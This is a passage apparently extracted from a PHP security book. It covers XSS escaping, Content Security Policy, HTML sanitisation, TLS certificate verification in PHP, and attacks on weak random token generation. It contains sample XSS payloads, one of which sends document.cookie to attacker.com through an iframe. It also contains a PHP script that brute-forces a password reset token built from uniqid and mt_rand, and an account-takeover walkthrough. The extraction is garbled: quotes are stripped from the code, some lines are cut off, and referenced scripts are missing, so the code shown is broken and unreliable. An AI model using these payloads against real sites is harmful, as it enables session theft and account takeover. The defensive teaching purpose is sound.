attribute names - thats what were trying to prevent! Finally, as with scripts, we cant allow attackers to inject directly into CSS as they may be able to perform UI Redress attacks and Javascript
scripting using the Internet Explorer supported expression() function.
Always HTML Escape Before Injecting Data Into The HTML Body Context
The HTML Body Context refers to textual content which is enclosed in tags, for example text
included between <body>, <div>, or any other pairing of tags used to contain text. Data injected
into this content must be HTML escaped.
HTML Escaping is well known in PHP since its implemented by the htmlspecialchars() function.
Always HTML Attribute Escape Before Injecting Data Into The HTML Attribute Context
The HTML Attribute Context refers to all values assigned to element attrbutes with the exception
of attributes which are interpreted by the browser as CDATA. This exception is a little tricky but
largely refers to non-XML HTML standards where Javascript can be included in event attributes
unescaped. For all other attributes, however, you have the following two choices:
1. If the attribute value is quoted, you MAY use HTML Escaping; but
2. If the attribute is unquoted, you MUST use HTML Attribute Escaping.
The second option also applies where attribute quoting style may be in doubt. For example, it is
perfectly valid in HTML5 to use unquoted attribute values and examples in the wild do exist. Ere
on the side of caution where there is any doubt.
Always Javascript Escape Before Injecting Data Into Javascript Data Values
Javascript data values are basically strings. Since you cant escape numbers, there is a sub-rule you
can apply:
Always Validate Numbers...
44
The Content-Security Policy (CSP) is a HTTP header which communicates a whitelist of trusted
resource sources that the browser can trust. Any source not included in the whitelist can now be
ignored by the browser since its untrusted. Consider the following:
X-Content-Security-Policy: script-src self
This CSP header tells the browser to only trust Javascript source URLs pointing to the current
domain. The browser will now grab scripts from this source but completely ignore all others.
This means that http://attacker.com/naughty.js is not downloaded if injected by an attacker. It also
means that all inline scripts, i.e. <script> tags, javascript: URIs or event attribute content are all
ignored too since they are not in the whitelist.
If we need to use Javascript from another source besides self, we can extend the whitelist to
include it. For example, lets include jQuerys CDN address.
X-Content-Security-Policy: script-src self http://code.jquery.com
You can add other resource directives, e.g. style-src for CSS, by dividing each resource directive
and its whitelisting with a semi-colon.
The format of the header value is very simple. The value is constructed with a resource directive script-src followed by a space delimited list of sources to apply as a whitelist. The
source can be a quoted keyword such as self or a URL. The URL value is matched based
on the information given. Information omitted in a URL can be freely altered in the HTML
document. Therefore http://code.jquery.com prevents loading scripts from http://jquery.com or
http://domainx.jquery.com because we were specific as to which subdomain to accept. If we
wanted to allow all subdomains we could have specified just http://jquery.com. The same thinking
applies to paths, ports, URL scheme, etc.
The nature of the CSPs whitelisting is simple. If you create a whitelist of a particular type of
resource, anything not on that whitelist is ignored. If you do not define a whitelist for a resource
type, then the browsers default behaviour kicks for that resource type.
Heres a list of the resource directives supported:
connect-src: Limits the sources to which you can connect using XMLHttpRequest, WebSockets,
etc. font-src: Limits the sources for web fonts. frame-src: Limits the source URLs that can be
embedded on a page as frames. img-src: Limits the sources for images. media-src: Limits the
sources for video and audio. object-src: Limits the sources for Flash and other plugins. script-src:
Limits the sources for script files. style-src: Limits the sources for CSS files.
For maintaining secure defaults, there is also the special default-src directive that can be used to
create a default whitelist for all of the above. For example:
The above will limit the source for all resources to the current domain but add an exception for
script-src to allow the jQuery CDN. This instantly shuts down all avenues for untrusted injected
4.5. Defending Against Cross-Site Scripting Attacks
45
resources and allows is to carefully open up the gates to only those sources we want the browser
to trust.
Besides URLs, the allowed sources can use the following keywords which must be encased with
single quotes:
none self unsafe-inline unsafe-eval
Youll notice the usage of the term unsafe. The best way of applying the CSP is to not duplicate
an attackers practices. Attackers want to inject inline Javascript and other resources. If we avoid
such inline practices, our web applications can tell browsers to ignore all such inlined resources
without exception. We can do this using external script files and Javascripts addEventListener()
function instead of event attributes. Of course, whats a rule without a few useful exceptions,
right? Seriously, eliminate any exceptions. Setting unsafe-inline as a whitelisting source just
goes against the whole point of using a CSP.
The none keyword means just that. If set as a resource source it just tells the browser to ignore
all resources of that type. Your mileage may vary but Id suggest doing something like this so your
CSP whitelist is always restricted to what it allows:
Just one final quirk to be aware of. Since the CSP is an emerging solution not yet out of draft,
youll need to dumplicate the X-Content-Security-Policy header to ensure its also picked up by
WebKit browsers like Safari and Chrome. I know, I know, thats WebKit for you.
46
The act of generating HTML from such inputs (unless we received HTML to start with!) occurs on
the server. That implies a trustworthy operation which is a common mistake to make. The HTML
that results from such generators was still determined by an untrusted input. We cant assume
its safe. This is simply more obvious with a blog feed since its entries are already valid HTML.
Lets take the following BBCode snippet:
[url=javascript:alert(I
Here![/url]
can
haz
Cookie?n+document.cookie)]Free
Bitcoins
BBCode does limit the allowed HTML by design but it doesnt mandate, for example, using HTTP
URLs and most generators wont notice this creeping through.
As another example, take the following selection of Markdown:
I
am
a
Markdown
paragraph.<script>document.write(<iframe
src=http://attacker.com?cookie= + document.cookie.escape() + height=0
width=0 />);</script>
Theres no need to panic. I swear I am just plain text!
Markdown is a popular alternative to writing HTML but it also allows authors to mix HTML into
Markdown. Its a perfectly valid Markdown feature and a Markdown renderer wont care whether
there is an XSS payload included.
After driving home this point, the course of action needed is to HTML sanitise whatever we are
going to include unescaped in web application output after all generation and other operations have
been completed. No exceptions. Its untrusted input until weve sanitised it outselves.
HTML Sanitisation is a laborious process of parsing the input HTML and applying a whitelist of
allowed elements, attributes and other values. Its not for the faint of heart, extremely easy to get
wrong, and PHP suffers from a long line of insecure libraries which claim to do it properly. Do
use a well established and reputable solution instead of writing one yourself.
The only library in PHP known to offer safe HTML Sanitisation is HTMLPurifier. Its actively
maintained, heavily peer reviewed and I strongly recommend it. Using HTMLPurifier is relatively
simple once you have some idea of the HTML markup to allow:
// Basic setup without a cache
$config = HTMLPurifier_Config::createDefault();
$config->set(Core, Encoding, UTF-8);
$config->set(HTML, Doctype, HTML 4.01 Transitional);
// Create the whitelist
$config->set(HTML.Allowed, p,b,a[href],i); // basic formatting and links
$sanitiser = new HTMLPurifier($config);
$output = $sanitiser->purify($untrustedHtml);
Do not use another HTML Sanitiser library unless you are absolutely certain about what youre
doing.
47
48
CHAPTER 5
Communication between parties over the internet is fraught with risk. When you are sending
payment instructions to a store using their online facility, the very last thing you ever want to
occur is for an attacker to be capable of intercepting, reading, manipulating or replaying the HTTP
request to the online application. You can imagine the consequences of an attacker being able to
read your session cookie, or to manipulate the payee, product or billing address, or to simply to
inject new HTML or Javascript into the markup sent in response to a user request to the store.
Protecting sensitive or private data is serious business. Application and browser users have an
extremely high expectation in this regard placing a high value on the integrity of their credit card
transactions, their privacy and their identity information. The answer to these concerns when it
comes to defending the transfer of data from between any two parties is to use Transport Layer
Security, typically involving HTTPS, TLS and SSL.
The broad goals of these security measures is as follows:
To securely encrypt data being exchanged
To guarantee the identity of one or both parties
To prevent data tampering
To prevent replay attacks
The most important point to notice in the above is that all four goals must be met in order for
Transport Layer Security to be successful. If any one of the above are compromised, we have a
real problem.
A common misconception, for example, is that encryption is the core goal and the others are nonessential. This is, in fact, completely untrue. Encryption of the data being transmitted requires
that the other party be capable of decrypting the data. This is possible because the client and the
server will agree on an encryption key (among other details) during the negotiation phase when
the client attempts a secure connection. However, an attacker may be able to place themselves
between the client and the server using a number of simple methods to trick a client machine into
believing that the attacker is the server being contacted, i.e. a Man-In-The-Middle (MitM) Attack.
49
This encryption key will be negotiated with the MitM and not the target server. This would allow
the attacker to decrypt all the data sent by the client. Obviously, we therefore need the second goal
- the ability to verify the identity of the server that the client is communicating with. Without that
verification check, we have no way of telling the difference between a genuine target server and an
MitM attacker.
So, all four of the above security goals MUST be met before a secure communication can take
place. They each work to perfectly complement the other three goals and it is the presence of all
four that provides reliable and robust Transport Layer Security.
Aside from the technical aspects of how Transport Layer Security works, the other facet of securely
exchanging data lies in how well we apply that security. For example, if we allow a user to submit
an applications login form data over HTTP we must then accept that an MitM is completely
capable of intercepting that data and recording the users login data for future use. If we allow
pages loaded over HTTPS to, in turn, load non-HTTPS resources then we must accept that a MitM
has a vehicle with which to inject Cross-Site Scripting attacks to turn the users browser into a
pre-programmed weapon that will operate over the browsers HTTPS connection tranparently.
In judging the security quality of any implementation, we therefore have some very obvious measures drawn from the four goals I earlier mentioned:
Encryption: Does the implementation use a strong security standard and cipher suite?
Identity: Does the implementation verify the servers identity correctly and completely?
Data Tampering: Does the implementation fully protect user data for the duration of the
users session?
Replay Attacks: Does the implementation contain a method of preventing an attacker from
recording requests and repetitively send them to the server to repeat a known action or effect?
These questions are your core knowledge for this entire chapter. I will go into far more detail over
the course of the chapter, but everything boils down to asking those questions and identifying the
vulnerabilities where they fail to hold true.
A second core understanding is what user data must be secured. Credit card details, personally
identifiable information and passwords are obviously in need of securing. However, what about
the users session ID? If we protect passwords but fail to protect the session ID, an attacker is still
fully capable of stealing the session cookie while in transit and performing a Session Hijacking
attack to impersonate the user on their own PC. Protecting login forms alone is NEVER sufficient
to protect a users account or personal information. The best security is obtained by restricting the
user session to HTTPS from the time they submit a login form to the time they end their session.
You should now understanding why this chapter uses the phrase insufficient. The problem in
implementing SSL/TLS lies not in failing to use it, but failing to use it to a sufficient degree that
user security is maximised.
This chapter covers the issue of Insufficient Transport Layer Security from three angles.
Between a server-side application and a third-party server.
50
51
and is backed up, in terms of expert peer review, by its large user base outside of PHP. Take this
one simple step towards greater security and you will not regret it. A more ideal solution would be
for PHPs internal developers to wake up and apply the Secure By Default principle to its built-in
SSL/TLS support.
My introduction to SSL/TLS in PHP is obviously very harsh. Transport Layer Security vulnerabilities are far more basic than most security issues and we are all familiar with the emphasis it
receives in browsers. Our server-side applications are no less important in the chain of securing
user data.Lets examine SSL/TLS in PHP in more detail by looking in turn at PHP Streams and the
superior CURL extension.
Streams default to using a File Wrapper, so you dont ordinarily need to use a file:// URL and can
even use relative paths. This should be obvious since most filesystem functions such as file(),
include(), require_once and file_get_contents() all accept stream references. So
we can rewrite the above example as:
file_get_contents(/tmp/file.ext);
Besides files, and of relevance to our current topic of discussion, we can also do the following:
file_get_contents(http://www.example.com);
52
Back to using PHP Streams as a simple HTTP client (which you now know is NOT recommended),
things get interesting when you try the following:
$url = https://api.twitter.com/1/statuses/public_timeline.json;
$result = file_get_contents($url);
The above is a simple unauthenticated request to the (former) Twitter API 1.0 over HTTPS. It also
has a serious flaw. PHP uses an SSL Context for requests made using the HTTPS (https://) and
FTPS (ftps://) wrappers. The SSL Context offers a lot of settings for SSL/TLS and their default
values are wholly insecure. The above example can be rewritten as follows to show how a default
set of SSL Context options can be plugged into file_get_contents() as a parameter:
$url = https://api.twitter.com/1/statuses/public_timeline.json;
$contextOptions = array(
ssl => array()
);
$sslContext = stream_context_create($contextOptions);
$result = file_get_contents($url, NULL, $sslContext);
As described earlier in this chapter, failing to securely configure SSL/TLS leaves the application
open to a Man-In-The-Middle (MitM) attacks. PHP Streams are entirely insecure over SSL/TLS
by default. So, lets correct the above example to make it completely secure!
$url = https://api.twitter.com/1/statuses/public_timeline.json;
$contextOptions = array(
ssl => array(
verify_peer
=> true,
cafile
=> /etc/ssl/certs/ca-certificates.crt,
verify_depth => 5,
CN_match
=> api.twitter.com,
disable_compression => true,
SNI_enabled
=> true,
ciphers
=> ALL!EXPORT!EXPORT40!EXPORT56!aNULL!LOW!RC4
)
);
$sslContext = stream_context_create($contextOptions);
$result = file_get_contents($url, NULL, $sslContext);
Now we have a secure example! If you contrast this with the earlier example, youll note that we
had to set four options which were, by default, unset or disabled by PHP. Lets examine each in
turn to demystify their purpose.
verify_peer
Peer Verification is the act of verifying that the SSL Certificate presented by the Host we sent the
HTTPS request to is valid. In order to be valid, the public certificate from the server must be
signed by the private key of a trusted Certificate Authority (CA). This can be verified using the
CAs public key which will be included in the file set as the cafile option to the SSL Context
were using. The certificate must also not have expired.
5.2. SSL/TLS From PHP (Server to Server)
53
cafile
The cafile setting must point to a valid file containing the public keys of trusted CAs. This
is not provided automatically by PHP so you need to have the keys in a concatenated certificate
formatted file (usually a PEM or CRT file). If youre having any difficulty locating a copy, you
can download a copy which is parsed from Mozillas VCS from http://curl.haxx.se/ca/cacert.pem .
Without this file, it is impossible to perform Peer Verification and the request will fail.
verify_depth
This setting sets the maximum allowed number of intermediate certificate issuers, i.e. the number
of CA certificates which are allowed to be followed while verifying the initial client certificate.
CN_match
The previous three options focused on verifying the certificate presented by the server. They do
not, however, tell us if the verified certificate is valid for the domain name or IP address we are
requesting, i.e. the host part of the URL. To ensure that the certificate is tied to the current domain/IP, we need to perform Host Verification. In PHP, this requires setting CN_match in the
SSL Context to the HTTP host value (including subdomain part if present!). PHP performs the
matching internally so long as this option is set. Not performing this check would allow an MitM
to present a valid certificate (which they can easily apply for on a domain under their control) and
reuse it during an attack to ensure they are presenting a certificate signed by a trusted CA. However, such a certificate would only be valid for their domain - and not the one you are seeking to
connect to. Setting the CN_match option will detect such certificate mismatches and cause the
HTTPS request to fail.
While such a valid certificate used by an attacker would contain identity information specific to the
attacker (a precondition of getting one!), please bear in mind that there are undoubtedly any number
of valid CA-signed certificates, complete with matching private keys, available to a knowledgeable
attacker. These may have been stolen from another company or slipped passed a trusted CAs radar
as happened in 2011 when DigiNotor notoriously (sorry, couldnt resist) issued a certificate for
google.com to an unknown party who went on to employ it in MitM attacks predominantly
against Iranian users.
disable_compression
This option was introduced in PHP 5.4.13 and it serves as a defence against CRIME attacks and
other padded oracle derived attacks such as BEAST. At the time of writing, it had been available
for 10 months and locating a single example of its use in open source PHP was practically a quest
in extreme patience.
SNI_enabled
Enables support for Server Name Indication where any single IP address may be configured to
present multiple SSL certificates rather than be restricted to a single certificate for all websites or
non-HTTP services hosted at that IP.
ciphers
54
This setting allows programmers to indicate which ciphers should or should not be used when
establishing SSL/TLS connections. The default list of ciphers supplied by the openssl extension
contain a number of unsafe ciphers which should be disabled unless absolutely necessary. The
above cipher list, in a syntax accepted by openssl, was implemented by cURL during January 2014.
An alternative cipher list has been suggested by Mozilla which may be better since it emphasises
Perfect Forward Secrecy which is an emerging best practice approach. The Mozilla list is a bit
longer:
ECDHE-RSA-AES128-GCM-SHA256:ECDHE-ECDSA-AES128-GCM-SHA256:ECDHE-RSA-AES256-GCM-SHA3
Limitations
As described above, verifying that the certificate presented by a server is valid for the host in the
URL that youre using ensures that a MitM cannot simply present any valid certificate they can
purchase or illegally obtain. This is an essential step, one of four, to ensuring your connection is
absolutely secure.
The CN_match parameter exposed by the SSL Context in PHPs HTTPS wrapper tells PHP
to perform this matching exercise but it has a downside. At the time of writing, the matching used
will only check the Common Name (CN) of the SSL certificate but ignore the equally valid Subject
Alternative Names (SANs) field if defined by the certificate. An SAN lets you protect multiple
domain names with a single SSL certificate so its extremely useful and supported by all modern
browsers. Since PHP does not currently support SAN matching, connections over SSL/TLS to a
domain secured using such a certificate will fail. SAN support for PHP will be introduced in PHP
5.6.
The CURL extension, on the other hand, supports SANs out of the box so it is far more reliable and
should be used in preference to PHPs built in HTTPS/FTPS wrappers. Using PHP Streams with
this issue introduces a greater risk of erroneous behaviour which in turn would tempt impatient
programmers to disable host verification altogether which is the very last thing we want to see.
SSL Context in PHP Sockets
Many HTTP clients in PHP will offer both a CURL adapter and a default PHP Socket based
adapter. The default choice for using sockets reflects the fact that CURL is an optional extension
and may be disabled on any given server in the wild.
PHP Sockets use the same SSL Context resource as PHP Streams so it inherits all of the problems and limitations described earlier. This has the side-effect that many major HTTP clients are
themselves, by default, likely to be unreliable and less safe than they should be. Such client libraries should, where possible, be configured to use their CURL adapter if available. You should
also review such clients to ensure they are not disabling (or forgetting to enable) the correct approach to secure SSL/TLS.
55
Additional Risks?
This is why my recommendation to you is to prefer CURL for HTTPS requests. Its secure by
default whereas PHP Streams is most definitely not. If you feel comfortable setting up SSL context
options, then feel free to use PHP Streams. Otherwise, just use CURL and avoid the headache. At
the end of the day, CURL is safer, requires less code, and is less likely to suffer a human-error
related failure in its SSL/TLS security.
At the time of writing, PHP 5.6 has reached an alpha1 release. The final release of PHP 5.6 will
introduce more secure defaults for PHP streams and socket connections over SSL/TLS. These
changes will not be backported to PHP 5.3, 5.4 or 5.5. As such, all programmers will need to
implement secure default settings as a concious choice until such time as PHP 5.6 is a minimum
requirement for their code.
Of course, if the CURL extension was enabled without the location of trusted certificate bundle being configured, the above example would still fail. For libraries intending to be publicly distributed,
the programmer will need to follow a sane pattern which enforces secure behaviour:
$url = https://api.twitter.com/1/statuses/public_timeline.json;
$req = curl_init($url);
curl_setopt($req, CURLOPT_RETURNTRANSFER, TRUE);
$result = curl_exec($req);
/**
* Check if an error is an SSL failure and retry with bundled CA certs on
* the assumption that local server has none configured for ext/curl.
* Error 77 refers to CURLE_SSL_CACERT_BADFILE which is not defined as
* as a constant in PHPs manual for some reason.
*/
$error = curl_errno($req);
if ($error == CURLE_SSL_PEER_CERTIFICATE || $error == CURLE_SSL_CACERT
56
|| $error == 77) {
curl_setopt($req, CURLOPT_CAINFO, __DIR__ . /cert-bundle.crt);
$result = curl_exec($req);
}
/**
* Any subsequent errors cannot be recovered from while remaining
* secure. So do NOT be tempted to disable SSL and try again ;).
*/
57
58
CHAPTER 6
Random values are everywhere in PHP. They are used in all frameworks, many libraries and you
probably have tons of code relying on them for generating tokens, salts, and as inputs into further
functions. Random values are important for a wide variety of use cases.
1. To randomly select options from a pool or range of known options.
2. To generate initialisation vectors for encryption.
3. To generate unguessable tokens or nonces for authorisation purposes.
4. To generate unique identifiers like Session IDs.
All of these have a specific weakness. If any attacker can guess or predict the output from the
Random Number Generator (RNG) or Pseudo-Random Number Generator (PRNG) you use, they
will be able to correctly guess the tokens, salts, nonces and cryptographic initialisation vectors created using that generator. Generating high quality, i.e. extremely difficult to guess, random values
is important. Allowing password reset tokens, CSRF tokens, API keys, nonces and authorisation
tokens to be predictable is not the best of ideas!
The two potential vulnerabilities linked to random values in PHP are:
1. Information Disclosure
2. Insufficient Entropy
Information Disclosure, in this context, refers to the leaking of the internal state, or seed value, of
a PRNG. Leaks of this kind can make predicting future output from the PRNG in use much easier.
Insufficient Entropy refers to the initial internal state or seed of a PRNG being so limited that it
or the PRNGs actual output is restricted to a more easily brute forcible range of possible values.
Neither is good news for PHP programmers.
Well examine both in greater detail with a practical attack scenario outlined soon but lets first
look at what a random value actually means when programming in PHP.
59
The above script is a simple loop executed after weve seeded PHPs Marsenne-Twister function
with a predetermined value (using the output from the example function in the docs for mt_srand()
which used the current seconds and microseconds). If you execute this script, it will print out 25
pseudorandom numbers. They all look random, there are no collisions and all seems fine. Run
the script again. Notice anything? Yes, the next run will print out the EXACT SAME numbers.
60
So will the third, fourth and fifth run. This is not always a guaranteed outcome given variations
between PHP versions in the past but this is irrelevant to the problem since it does hold true in all
modern PHP versions.
If the attacker can obtain the seed value used in PHPs Mersenne Twister PRNG, they can predict
all of the output from mt_rand(). When it comes to PRNGs, protecting the seed is paramount. If
you lose it, you are no longer generating random values... This seed can be generated in one of two
ways. You can use the mt_srand() function to manually set it or you can omit mt_srand() and let
PHP generate it automatically. The second is much preferred but legacy applications, even today,
often inherit the use of mt_srand() even if ported to higher PHP versions.
This raises a risk whereby the recovery of a seed value by an attacker (i.e. a successful Seed
Recovery Attack) provides them with sufficient information to predict future values. As a result,
any application which leaks such a seed to potential attackers has fallen afoul of an Information
Disclosure vulnerability. This is actually a real vulnerability despite its apparently passive nature.
Leaking information about the local system can assist an attacker in follow up attacks which would
be a violation of the Defense In Depth principle.
61
be blocked until sufficient entropy has been captured from the system environment. You should
revert to /dev/random, obviously, for the most critical of needs when necessary.
All of this leads us to the following rule...
All processes which require non-trivial random numbers MUST attempt to use
openssl_pseudo_random_bytes(). You MAY fallback to mcrypt_create_iv() with
the source set to MCRYPT_DEV_URANDOM. You MAY also attempt to directly read
bytes from /dev/urandom. If all else fails, and you have no other choice,
you MUST instead generate a value by strongly mixing multiple sources of
available random or secret values.
You can find a reference implementation of this rule in the SecurityMultiTool reference library. As
is typical PHP Internals prefers to complicate programmers lives rather than include something
secure directly in PHPs core.
Enough theory, lets actually look into how we can attack an application with this information.
There are certainly more complicated means of generating a token but this is a nice variant with
only one call to mt_rand() that is hashed using SHA512. In practice, if a programmer assumes
that PHPs random value functions are sufficiently random, they are far more likely to utilise a
simple usage pattern so long as it doesnt involve the cryptography word. Non-cryptographic
uses may include access tokens, CSRF tokens, API nonces and password reset tokens to name a
62
few. Let me describe the characteristics of this vulnerable application in greater detail before we
continue any further so we have some insight into the factors making this application vulnerable.
63
no hashing whatsoever). The example code were using generates tokens with some of these factors in evidence. I also included SHA512 hashing to demonstrate that obscuration is simply never
a solution. SHA512 is actually a weak hashing solution in the sense that it is fast to compute, i.e.
it allows an attacker to brute force inputs on any CPU or GPU at some incredible rates bearing in
mind that Moores Law ensures that that rate increases with each new CPU/GPU generation. This
is why passwords must be hashed with something that requires a fixed time to execute irrespective
of CPU/GPU performance or Moores Law.
64
This simulates the token from Request A (which is our SHA512 hash hiding the generated random
number we need) and run it through hashcat using the following command.
65
This might take a bit more time than cracking the SHA512 hash since its CPU bound, but it will
search the entire possible seed space inside of a few minutes on a decent CPU. The result will be
one or more candidate seeds (i.e. seeds which produce the given random number). Once again,
were seeing the outcome of weak entropy, though this time as it pertains to how PHP generates
seed values for its Marsenne-Twister function. Well revisit how these seeds are generated later on
so you can see why such a brute forcing attack is possible in such a spectacularly short time.
In the above steps, we made use of simple brute forcing tools that exist in the wild. Just because
these tools have a narrow focus on single mt_rand() calls, bear in mind that they represent proofs of
concept that can be modified for other scenarios (e.g. sequential mt_rand() calls when generating
tokens). Also bear in mind that the cracking speed does not preclude the generation of rainbow tables tailored to specific token generating approaches. Heres another generic tool written in Python
which targets PHP mt_rand() vulnerabilities: https://github.com/GeorgeArgyros/Snowflake
66
This function will predict the reset token for each candidate seed.
Step 6 and 7: Reset the Administator Account Password/Be naughty!
All you need to do now is construct a URL containing the token which will let you reset the Administrators password via the vulnerable application, gain access to their account, and probably find
out that they can post unfiltered HTML to a forum or article (another Defense In Depth violation
that can be common). That would allow you to mount a widespread Cross-Site Scripting (XSS)
attack on all other application users by infecting their PCs with malware and Man-In-The-Browser
monitors. Seriously, why stop with just access? The whole point of these seemingly passive, minor
and low severity vulnerabilities is to help attackers slowly worm their way into a position where
they can achieve their ultimate goal. Hacking is like playing an arcade fighting game where you
need combination attacks to pull off some devastating moves.
67
framework, in question is doing nothing to mitigate against Seed Recovery Attacks. Do we blame
the user for leaking mt_rand() values or the library for not using better randomness?
The answer to that is that there is enough blame to go around for both. The library should not be
using mt_rand() (or any other single source of weak entropy) for any sensitive purposes as its sole
source of random values, and the user should not be writing code that leaks mt_rand() values to
the world. So yes, we can actually start pointing fingers at unwise uses of mt_rand() even where
those uses are not directly leaking to attackers.
So not only do we have to worry about Information Disclosure vulnerabilities, we also need to be
conscious of Insufficient Entropy vulnerabilities which leave applications vulnerable to brute force
attacks on sensitive tokens, keys or nonces which, while not technically cryptography related, are
still used for important non-trivial functions in an application.
Assuming the presence of an Information Disclosure vulnerability, we can now state that this
method of generating tokens is completely useless also. To understand why this is so, we need to
take a closer look at PHPs uniqid() function. The definition of this function is as follows:
Gets a prefixed unique identifier based on the current time in microseconds.
If you remember from our discussion of entropy, you measure entropy by the amount of uncertainty
it introduces. In the presence of an Information Disclosure vulnerability which leaks mt_rand()
values, our use of mt_rand() as a prefix to a unique identifier has zero uncertainty. The only other
input to uniqid() in the example is time. Time is definitely NOT uncertain. It progresses in a
predictable linear manner. Predictable values have very low entropy.
Of course, the definition notes microseconds, i.e. millionths of a second. That provides
1,000,000 possible numbers. I ignore the larger seconds value since that is so large grained and
measurable (e.g. the HTTP Date header in a response) that it adds almost nothing of value. Before
we get into more technical details, lets dissect the uniqid() function by looking at its C code.
gettimeofday((struct timeval *) &tv, (struct timezone *) NULL);
sec = (int) tv.tv_sec;
usec = (int) (tv.tv_usec % 0x100000);
/* The max value usec can have is 0xF423F, so we use only five hex
* digits for usecs.
*/
if (more_entropy) {
68
If that looks complicated, you can actually replicate all of this in plain old PHP:
function unique_id($prefix = , $more_entropy = false) {
list($usec, $sec) = explode( , microtime());
$usec *= 1000000;
if(true === $more_entropy) {
return sprintf(%s%08x%05x%.8F, $prefix, $sec, $usec, lcg_value()*10);
} else {
return sprintf(%s%08x%05x, $prefix, $sec, $usec);
}
}
This code basically tells us that a simple uniqid() call with no parameters will return a string containing 13 characters. The first 8 characters are the current Unix timestamp (seconds) in hexadecimal. The final 5 characters represent any additional microseconds in hexadecimal. In other words,
a basic uniqid() will provide a very accurate system time measurement which you can dissect from
a simple uniqid() call using something like this:
$id = uniqid();
$time = str_split($id, 8);
$sec = hexdec(0x . $time[0]);
$usec = hexdec(0x . $time[1]);
echo Seconds: , $sec, PHP_EOL, Microseconds: , $usec, PHP_EOL;
Indeed, looking at the C code, this accurate system timestamp is never obscured in the output no
matter what parameters you use.
echo uniqid(), PHP_EOL;
echo uniqid(prefix-), PHP_EOL;
echo uniqid(prefix-, true), PHP_EOL;
// 514ee7f81c4b8
// prefix-514ee7f81c746
// prefix-514ee7f81c8993.39593322
69
Taking the above example, we can see that by combining a Seed Recovery Attack against mt_rand()
and leveraging an Information Disclosure from uniqid(), we can now make inroads in calculating a
narrower-then-expected selection of SHA512 hashes that might be a password reset or other sensitive token. Heck, if you want to narrow the timestamp range without any naked uniqid() disclosure
leaking system time, server responses will typically have a HTTP Date header to analyse for a
server-accurate timestamp. Since this just leaves the remaining entropy as one million possible
microsecond values, we can just brute force this in a few seconds!
<?php
echo PHP_EOL;
/**
* Generate token to crack without leaking microtime
*/
mt_srand(1361723136.7);
$token = hash(sha512, uniqid(mt_rand()));
/**
* Now crack the Token without the benefit of microsecond measurement
* but remember we get seconds from HTTP Date header and seed for
* mt_rand() using earlier attack scenario ;)
*/
$httpDateSeconds = time();
$bruteForcedSeed = 1361723136.7;
mt_srand($bruteForcedSeed);
$prefix = mt_rand();
/**
* Increment HTTP Date by a few seconds to offset the possibility of
* us crossing the second tick between uniqid() and time() calls.
*/
for ($j=$httpDateSeconds; $j < $httpDateSeconds+2; $j++) {
for ($i=0; $i < 1000000; $i++) {
/** Replicate uniqid() token generator in PHP */
$guess = hash(sha512, sprintf(%s%8x%5x, $prefix, $j, $i));
if ($token == $guess) {
echo PHP_EOL, Actual Token: , $token, PHP_EOL,
Forced Token: , $guess, PHP_EOL;
exit(0);
}
if (($i % 20000) == 0) {
echo ~;
}
}
}
70
As the C code shows, this new source of entropy uses output from an internal php_combined_lcg()
function. This function is actually exposed to userland through the lcg_value() function which I
used in my PHP translation of the uniqid() function. It basically combines two values generated
using two separately seeded Linear Congruential Generators (LCGs). Here is the code actually
used to seed these two LCGs. Similar to mt_rand() seeding, the seeds are generated once per PHP
process and then reused in all subsequent calls.
static void lcg_seed(TSRMLS_D) /* {{{ */
{
struct timeval tv;
if (gettimeofday(&tv, NULL) == 0) {
LCG(s1) = tv.tv_sec ^ (tv.tv_usec<<11);
} else {
LCG(s1) = 1;
}
#ifdef ZTS
LCG(s2) = (long) tsrm_thread_id();
#else
LCG(s2) = (long) getpid();
#endif
/* Add entropy to s2 by calling gettimeofday() again */
if (gettimeofday(&tv, NULL) == 0) {
LCG(s2) ^= (tv.tv_usec<<11);
}
LCG(seeded) = 1;
}
If you stare at this long enough and feel tempted to smash something into your monitor, Id urge
you to reconsider. Monitors are expensive.
The two seeds both use the gettimeofday() function in C to capture the current seconds since Unix
Epoch (relative to the server clock) and microseconds. Its worth noting that both calls are fixed in
the source code so the microsecond() count between both will be minimal so the uncertainty they
add is not a lot. The second seed will also mix in the current process ID which, in most cases, will
be a maximum number of 32,768 under Linux. You can, of course, manually set this as high as ~4
million by writing to /proc/sys/kernel/pid_max but this is very unlikely to reach that high.
The pattern emerging here is that the primary source of entropy used by these LCGs is microsec6.5. Brute Force Attacking Unique IDs
71
onds. For example, remember our mt_rand() seed? Guess how that is calculated.
#ifdef PHP_WIN32
#define GENERATE_SEED() (((long) (time(0) * GetCurrentProcessId())) ^ ((long) (1000
#else
#define GENERATE_SEED() (((long) (time(0) * getpid())) ^ ((long) (1000000.0 * php_c
#endif
Youll notice that this means that all seeds used in PHP are interdependent and even mix together
similar inputs multiple times. You can feasibly limit the range of initial microseconds as we previously discussed, using two requests where the first hits the transition between seconds (so microtime with be 0 plus exec time to next gettimeofday() C call), and even calculate the delta in
microseconds between other gettimeofday() calls with access to the source code (PHP being open
source is a leg up). Not to mention that brute forcing a mt_rand() seed gives you the final seed
output to play with for offline verification.
The main problem here is, however, php_combined_lcg(). This is the underlying implementation
of the userland lcg_value() function which is seeded once per PHP process and where knowledge
of the seed makes its output predictable. If we can crack that particular nut, its effectively game
over.
The above generates a pre-hash value for the Session ID using an IP address, timestamp, microseconds and...the output from php_combined_lcg(). Given a significant reduction in microtime
possibilities (the above needs 1 for generating the ID and 2 within php_combined_lcg() which
should have minimum changes between them) we can now perform a brute forcing attack. Well,
maybe.
As you may recall from earlier, PHP now supports some newer session options such as session.entropy_file and session.entropy_length. The reason for this was to prevent brute forcing
attacks on the session ID that would quickly (as in not take hours) reveal the two seeds to the
twin LCGs combined by php_combined_lcg(). If you are running PHP 5.3 or less, you may not
72
have those settings properly configured which would mean you have another useful Information
Disclosure vulnerability exposed which will enable brute forcing of session IDs to get the LCG
seeds.
Theres a Windows app to figure out the LCG seeds in such cases to prove the point:
http://blog.ptsecurity.com/2012/08/not-so-random-numbers-take-two.html
More interestingly, knowledge of the LCG states feeds into how mt_rand() is seeded so this is
another path to get around any lack of mt_rand() value leaks.
What does this mean for adding more entropy to uniqid() return values?
$token = hash(sha512, uniqid(mt_rand(), true));
The above is another example of a potential Insufficient Entropy vulnerability. You cannot rely on
entropy which is being leaked from elsewhere (even if you are not responsible for the leaking!).
